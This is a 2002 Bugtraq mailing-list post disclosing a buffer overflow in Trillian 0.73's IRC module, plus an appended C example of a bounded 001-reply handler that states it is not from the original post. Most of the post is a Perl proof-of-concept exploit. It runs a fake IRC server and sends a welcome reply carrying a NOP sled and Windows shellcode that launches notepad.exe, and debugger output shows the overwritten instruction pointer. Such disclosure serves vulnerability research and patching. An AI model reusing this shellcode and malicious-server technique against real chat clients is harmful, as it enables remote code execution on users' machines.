[26498] in bugtraq
trillian buffer overflow
daemon@ATHENA.MIT.EDU (John C. Hennessy)
Thu Aug 1 18:26:36 2002
Message-ID: <012001c239a5$b10dbd90$c5798fd1@kibble>
From: "John C. Hennessy" <johnh@charm.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 1 Aug 2002 14:52:11 -0700
Problem:
Trillian's IRC module suffers from a buffer overflow. This allows an attacker to execute code of their choice. I have attempted to contact the Trillian developers about this issue with no success.
John C. Hennessy
Information security analyst
----------------------Proof of concept code-------------------------
#!/usr/local/bin/perl
#---------------------sicillian.pl-----------------------
#- Proof of concept exploit for trillian's irc module.  -
#- Tested on trillian 0.73 but i suspect all versions   -
#- prior may be exploited as well.                      -
#-                                                      -
#- John C. Hennessy (Information security analyst)      -
#--------------------------------------------------------
use Socket;
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x90" x 174;           # NOP sled in front of the egg
$buf .= $egg;
#$buf .= "A" x 2;
$buf .= "\x41\x41\x41\x41";    # lands in the saved return address (eip=41414141 in the debugger output)
#$buf .= "B" x 80;
# Act as the IRC server on 127.0.0.1:6667 and wait for the client to connect.
my $host = inet_aton("127.0.0.1");
my $proto = getprotobyname("tcp");
my $port = 6667;
my $add_port = sockaddr_in($port,$host);
my $ser_sock = socket(SOCKET,PF_INET,SOCK_STREAM,$proto) or die "Cannot open Socket: $!";
bind(SOCKET,$add_port) or die "\nCouldn't bind to port $port : $!\n ";
my $connection = listen(SOCKET,5) or die "Couldn't listen on $port: $!\n";
while(accept(CLIENT,SOCKET)){
# print message from client
#my $ans = <CLIENT>;
#print $ans;
#echo message back to client.
# Send a PING followed by a 001 (welcome) numeric whose text carries the oversized buffer.
print CLIENT "PING :1986115026\r\n001 :irc.random.org trillian :$buf\r\n";
}
close(SOCKET);
------------------Snippet from debugger attached to trillian.exe------------------
Access violation - code c0000005 (first chance)
eax=00000000 ebx=022738c8 ecx=100446d0 edx=00000901 esi=02274e60 edi=022738c8
eip=41414141 esp=0012ca58 ebp=01283718 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
41414141 ?? ???
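The crash above is caused by a server reply whose text is longer than the field the client copies it into. As an added example (not Trillian's code and not from the original post), here is a hypothetical hardened handler for the 001 numeric that bounds the copy by the destination size as well as by the RFC 1459 line limit; the constructed 235-byte fill matches the PoC payload size (174 NOP bytes, the 46-byte egg, "notepad.exe" and 4 bytes of return address), and the handler and helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#define IRC_MAX_LINE 512  /* RFC 1459: a line is at most 512 bytes incl. CRLF */

/* Hypothetical client handler for the 001 (RPL_WELCOME) numeric: copies the
 * numeric's trailing text into a caller-supplied fixed-size buffer, the kind
 * of destination that overflows when a copy is bounded by the input instead
 * of by the destination. Returns 0 on success, -1 when the line is rejected
 * (too long, not a 001 reply, text too big for `out`); `out` is then empty. */
int handle_welcome(const char *line, char *out, size_t outsz)
{
    size_t len = strlen(line);
    const char *text;
    if (outsz) out[0] = '\0';
    if (len == 0 || len >= IRC_MAX_LINE)   /* bound 1: protocol line length */
        return -1;
    if (line[0] == ':') {                   /* skip an optional ":prefix " */
        if (!(line = strchr(line, ' '))) return -1;
        line++;
    }
    if (strncmp(line, "001 ", 4) != 0)
        return -1;
    text = line + 4;                        /* trailing param starts at ':' */
    if (*text != ':') {
        if (!(text = strstr(text, " :"))) return -1;
        text++;
    }
    text++;
    len = strcspn(text, "\r\n");
    /* bound 2: the destination. A legal sub-512-byte line can still overrun
     * a smaller field; the PoC's 235-byte payload is exactly that case. */
    if (len >= outsz)
        return -1;
    memcpy(out, text, len);
    out[len] = '\0';
    return 0;
}

/* Build a 001 reply carrying `fill` bytes of 'A' as its text (constructed
 * input, not captured traffic) and run it through the handler. */
int welcome_with_fill(size_t fill, char *out, size_t outsz)
{
    char raw[1024];
    int n = snprintf(raw, sizeof raw, "001 :irc.random.org trillian :");
    if (fill > sizeof raw - (size_t)n - 3) fill = sizeof raw - (size_t)n - 3;
    memset(raw + n, 'A', fill);
    memcpy(raw + n + fill, "\r\n", 3);
    return handle_welcome(raw, out, outsz);
}
```

A 235-byte reply is a legal IRC line, so the line-length check alone accepts it into a 512-byte field; only the destination bound rejects it for a 128-byte one.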